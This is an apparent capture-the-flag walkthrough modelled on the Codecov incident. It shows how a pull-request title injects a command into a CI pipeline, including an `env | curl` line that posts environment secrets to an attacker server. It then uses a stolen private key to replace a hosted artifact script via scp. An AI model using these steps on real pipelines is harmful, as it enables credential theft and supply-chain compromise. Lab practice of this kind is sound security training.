This challenge draws inspiration from the Codecov incident, in which a 3rd party artifact included in the pipeline is hijacked.
Codecov has a script used in customers’ CI pipelines. The script was hosted separately from its open-sourced code. The script was modified directly where it’s stored (without changing the source code) with malicious code that stole credentials from pipeline jobs.
Pipelines that would have validated the script’s hash against the repository code, would have prevented a successful attack.
In the challenge, Reportcov is a public repository of a 3rd party used by other CI pipelines. It has its own pipeline (which you can’t view), creating an artifact stored remotely. You can execute command injection in the pipeline in order to run malicious code in the job, steal the private key of the server hosting the artifact, and then modify it to exfiltrate credentials from CI pipelines that use the artifact.
-
Fork the Cov/reportcov repository and create an arbitrary change.
-
Create a pull request with the following command as its title:
`env | curl -H "Content-Type: application/json" -X POST -d "$(</dev/stdin)" <YOUR SERVER>`The injection is possible since the following line treats the title as a bash variable and as such it can evaluate command substitution inside.
sh "echo Pull Request ${title} created in the reportcov repository"GitHub published an interesting article about command injection in CI pipelines.
-
Use the private key to upload a malicious reportcov.sh script:
echo "${FLAG}" | base64 > reportcov.sh chmod 400 key scp -P 2222 -i key reportcov.sh root@localhost:/var/www/localhost/htdocs
-
Run the dormouse pipeline.
-
Access the console output of the executed job to get the secret.